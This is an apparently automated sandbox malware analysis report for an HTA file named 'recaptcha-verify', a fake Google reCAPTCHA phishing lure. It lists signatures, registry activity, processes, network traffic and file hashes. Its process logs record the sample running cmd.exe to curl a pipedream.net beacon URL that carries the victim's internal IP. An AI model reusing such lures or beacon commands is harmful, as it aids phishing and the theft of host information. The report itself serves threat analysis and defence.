Malware Analysis Report

2024-11-16 15:45

Sample ID 241107-2d8qssyngx
Target recaptcha-verify
SHA256 6367db8e2f02618dd034cd2e78273875756ec9cb20b2e396ce0cacb2e774c54f
Tags
google discovery evasion phishing trojan
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

6367db8e2f02618dd034cd2e78273875756ec9cb20b2e396ce0cacb2e774c54f

Threat Level: Likely malicious

The file recaptcha-verify was found to be: Likely malicious.

Malicious Activity Summary

google discovery evasion phishing trojan

Blocklisted process makes network request

A potential corporate email address has been identified in the URL: [email protected]

Checks computer location settings

Checks whether UAC is enabled

Detected potential entity reuse from brand GOOGLE.

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Delays execution with timeout.exe

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 22:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 22:29

Reported

2024-11-07 22:31

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\recaptcha-verify.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

A potential corporate email address has been identified in the URL: [email protected]

phishing

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\mshta.exe N/A

Detected potential entity reuse from brand GOOGLE.

phishing google

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F8536811-9D57-11EF-BA5A-5EE01BAFE073} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1820 wrote to memory of 2244 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1820 wrote to memory of 2244 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1820 wrote to memory of 2244 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1820 wrote to memory of 2244 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1820 wrote to memory of 2520 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 2520 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 2520 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 2520 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 2528 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 2528 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 2528 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 2528 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\timeout.exe
PID 1608 wrote to memory of 1044 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1608 wrote to memory of 1044 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1608 wrote to memory of 1044 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1608 wrote to memory of 1044 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1608 wrote to memory of 2216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1608 wrote to memory of 2216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1608 wrote to memory of 2216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1608 wrote to memory of 2216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\recaptcha-verify.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://b35ce1c36a54234757b98d862f1673a8.m.pipedream.net/XPAJOTIY_10.127.0.221

C:\Windows\SysWOW64\timeout.exe

"C:\Windows\System32\timeout.exe" /T 4 /nobreak

C:\Windows\SysWOW64\timeout.exe

"C:\Windows\System32\timeout.exe" /T 1 /nobreak

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1608 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1608 CREDAT:472068 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 support.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.169.14:443 support.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.212.227:80 o.pki.goog tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 policies.google.com udp
GB 142.250.187.238:443 policies.google.com tcp
GB 142.250.187.238:443 policies.google.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPUI9R2R\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

memory/1820-46-0x0000000001060000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 49c184f9bcfa8d7f049555254aeefdec
SHA1 133d3af6f7783103fa8f5f0fb237b4c730ac7a3c
SHA256 251d652ba33fadf085c8121b4053e7f6878106e2d0be47f5b76e4652697c23f1
SHA512 0737580f225444288989723923376c280d9c901dd14971810b3fa8ab50a5204174b34fa96ff95588851c9a0bf7db83f9b8730cc4e836e08a1963d14c0ba1b57d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

MD5 e935bc5762068caf3e24a2683b1b8a88
SHA1 82b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256 a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512 bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_6C4EDE6B4E04AD6FDB8E61232C576EF9

MD5 41c2383205d3cd55324f4279de79ba26
SHA1 6ec986a7f44a159d08741275f50e5c2d01c67153
SHA256 015e9b6459510d8235be692b3d0efca022673aefa133dd058d092242b4c5eac1
SHA512 45f211e62a974cb25e18003fe25e0f712d57f467629d90a25b788ce85df488534e3f5bf0f9364a409ab00b86377d3998ddca52c63d1e213b6770e51769fd6731

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_6C4EDE6B4E04AD6FDB8E61232C576EF9

MD5 d0eabb4984fdd8f25ce24d839f20a056
SHA1 a9c47c5bbd28b6bc98b186830bcb00e09430de0d
SHA256 a39291fccda2e4ec72353e74770d3a137af95eecd36975bbcc131969eaf0a293
SHA512 c047a1a4a9ca10284fe49ca7c498046627796fc7ba8e7a5c1a0136ef457b1f4100462708f2bde9cf12737efa46496a9a478e5a3812cb0084f5813135608b1a66

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

MD5 4a2ee50bf5ce0f41d33d4bc33cdf98c5
SHA1 a07edafbd225dd342cd8ffa4c80ef566d02373b4
SHA256 5b6567c76742027c5418d73a73ef3c7661500e1f1d8c67e8b7cfb9995ed436b1
SHA512 0884887f7cf5f6555f19134fb171f5aa5a3ab3832ecb8080df85b08a9573871b704ad0d137df1eb7847a49a45b4a807e7394d45f9d0c9e3fd394c69e6a06f1f7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 d903703091ab54555ac8ce610dedd75c
SHA1 75546c6f4b547116b77ab54a992dd4640767190f
SHA256 ed684ae903ce31b6372db9ff89ee0ef9f8eb595520ffbf72726787c8add1d67e
SHA512 f14fe21a4122367552e4e2508b13d219560eff94034c62b1e576ff6cb590f4fbf7ecaf940bf91e17a170a60902ffbcf73b4d7afcd9de7c2c2794abcbfea71027

C:\Users\Admin\AppData\Local\Temp\Cab47E9.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\~DFE7D1F69C51CCC32A.TMP

MD5 7dcf8fb8c6d1c715eea38d010f6f8110
SHA1 4fc0981e4d2a75828320c7e1a0e343505da54f13
SHA256 24186ed2281ad8372670279fc83951b69bd218cbf51c61ac49a261dad4699a70
SHA512 4f13c9e39874c23bc085583bd45b8a1d69d59324a1a0cb10a40fd2ca83ad74c2a53820ec7a9ea7b02739e02812e2c2883992ca677496ab44058c3662a082be03

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 22:29

Reported

2024-11-07 22:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\recaptcha-verify.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

A potential corporate email address has been identified in the URL: [email protected]

phishing

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Detected potential entity reuse from brand GOOGLE.

phishing google

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3248 wrote to memory of 2004 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3248 wrote to memory of 2004 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3248 wrote to memory of 2004 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2004 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2004 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2004 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\recaptcha-verify.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://b35ce1c36a54234757b98d862f1673a8.m.pipedream.net/SPDEBJWH_10.127.0.118

C:\Windows\SysWOW64\curl.exe

curl https://b35ce1c36a54234757b98d862f1673a8.m.pipedream.net/SPDEBJWH_10.127.0.118

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 support.google.com udp
GB 172.217.169.14:443 support.google.com tcp
US 8.8.8.8:53 b35ce1c36a54234757b98d862f1673a8.m.pipedream.net udp
US 3.234.57.236:443 b35ce1c36a54234757b98d862f1673a8.m.pipedream.net tcp
US 8.8.8.8:53 14.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 236.57.234.3.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.212.227:80 o.pki.goog tcp
GB 216.58.212.227:80 o.pki.goog tcp
US 8.8.8.8:53 90.193.84.52.in-addr.arpa udp
US 8.8.8.8:53 228.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ocsp.r2m03.amazontrust.com udp
FR 13.249.8.192:80 ocsp.r2m03.amazontrust.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 192.8.249.13.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 75.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp

Files

N/A